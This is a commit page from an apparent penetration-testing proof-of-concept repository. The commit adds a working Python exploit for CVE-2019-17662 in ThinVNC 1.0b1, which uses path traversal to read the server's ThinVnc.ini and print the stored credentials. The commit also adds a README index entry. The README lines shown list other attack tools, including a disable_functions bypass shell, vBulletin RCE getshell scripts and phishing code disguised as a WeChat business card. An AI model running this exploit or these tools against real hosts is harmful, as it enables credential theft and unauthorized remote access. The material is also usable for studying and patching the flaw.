admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-06-20 01:40:29 +00:00
Code Issues Packages Projects Releases Wiki Activity

add CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass

Browse Source
This commit is contained in:
mr-xn 2019-10-17 21:52:06 +08:00
parent 87f5a9700f
commit fadc625bad
2 changed files with 53 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md Normal file
View File

@ -0,0 +1,51 @@
## ThinVNC 1.0b1 - Authentication Bypass
## 简介
ThinVNC是一款基于HTML5和AJAX的远程桌面实现
## POC
```python
# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
# Date: 2019-10-17
# Exploit Author: Nikhith Tumamlapalli
# Contributor WarMarX
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
# Version: 1.0b1
# Tested on: Windows All Platforms
# CVE : CVE-2019-17662
# Description:
# Authentication Bypass via Arbitrary File Read
#!/usr/bin/python3
import sys
import os
import requests
def exploit(host,port):
url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
r = requests.get(url)
body = r.text
print(body.splitlines()[2])
print(body.splitlines()[3])
def main():
if(len(sys.argv)!=3):
print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
print("Example:\n{} 192.168.0.10 5888")
else:
port = sys.argv[2]
host = sys.argv[1]
exploit(host,port)
if __name__ == '__main__':
main()
```

2
README.md
View File

@ -74,6 +74,7 @@
- [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md)
- [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md)
- [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./构建ASMX绕过限制WAF达到命令执行.md)
- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1 - Authentication%20Bypass.md)
## 提权辅助相关
@ -97,6 +98,7 @@
- [python2的socks代理](./tools/s5.py)
- [dede_burp_admin_path-dedecms后台路径爆破(Windows环境)](./tools/dede_burp_admin_path.md)
- [PHP 7.1-7.3 disable_functions bypass](./tools/PHP%207.1-7.3%20disable_functions%20bypass.md)
- [一个各种方式突破Disable_functions达到命令执行的shell](https://github.com/l3m0n/Bypass_Disable_functions_Shell)
- [cmd下查询3389远程桌面端口](./tools/cmd下查询3389远程桌面端口.md)
- [伪装成企业微信名片的钓鱼代码](./tools/伪装成企业微信名片的钓鱼代码.txt)
- [vbulletin5-rce利用工具(批量检测/getshell)](https://github.com/theLSA/vbulletin5-rce)/[保存了一份源码:vbulletin5-rce.py](./tools/vbulletin5-rce.py)